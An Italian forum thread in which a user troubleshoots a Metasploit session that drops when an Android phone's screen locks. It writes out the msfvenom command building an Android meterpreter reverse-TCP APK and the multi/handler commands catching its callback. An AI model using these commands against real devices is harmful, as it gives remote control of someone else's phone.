Problema Msfconsole si interrompe se si blocca lo schermo del telefono

Sghiggix

Nuovo utente
Autore del topic
2 Maggio 2017
7
9
Miglior risposta
0
Salve a tutti.
Come da titolo il mio problema consiste nel fatto che quando io collego un device Android a metasploit ( girante su kali Linux) aprendo dal telefono l' exploit creato con msfvenom e poi blocco lo schermo, la connessione con la console di metasploit salta..... come posso risolvere? Se si può:emoji_laughing:
 
Ultima modifica:
Che comando hai usato per creare l'exploit?
PS: la sezione non mi sembra per niente corretta
 
@Sghiggix La sezione non è corretta. Sposto in una più coerente con l'argomento trattato.
La prossima volta presta più attenzione.
 
Ho usato questo comando qua:

msfvenom -p android/meterpreter/reverse_tcp LHOST=(mio ip) LPORT=(ho messo 4444) R > exploit.apk
Ok questo è il comando per creare l'exploit, invece cosa fai quando devi lanciare l'exploit? Spiegami la procedura e i comandi.
 
Ok questo è il comando per creare l'exploit, invece cosa fai quando devi lanciare l'exploit? Spiegami la procedura e i comandi.
Eseguo questi comandi:
- msfconsole
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST ( mio ip locale )
- set LPORT ( porta in genere uso la 4444 )
- exploit oppure run..... è indifferente

A questo punto apro l'app sul telefono e si collega.
I vari comandi funzionano alla perfezione fino a quando non si blocca lo schermo del telefono
 
Eseguo questi comandi:
- msfconsole
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST ( mio ip locale )
- set LPORT ( porta in genere uso la 4444 )
- exploit oppure run..... è indifferente

A questo punto apro l'app sul telefono e si collega.
I vari comandi funzionano alla perfezione fino a quando non si blocca lo schermo del telefono
Niente di anormale. Cosa succede se invece lasci che lo schermo si disattivi automaticamente? Si chiude lo stesso la connessione?
 
Ho provato a farlo bloccare e non si scollega, allora ho provato a bloccarlo con il bottone eeeeee magiaaa non si scollega piú chissà perché me lo faceva.
Bah.
Comunque mi dispiace di avervi fatto perdere tempo.
 
Ho provato a farlo bloccare e non si scollega, allora ho provato a bloccarlo con il bottone eeeeee magiaaa non si scollega piú chissà perché me lo faceva.
Bah.
Comunque mi dispiace di avervi fatto perdere tempo.
Tranquillo anche io ho avuto questo problema all'inizio, si tratta semplicemente di smanettarci un po'.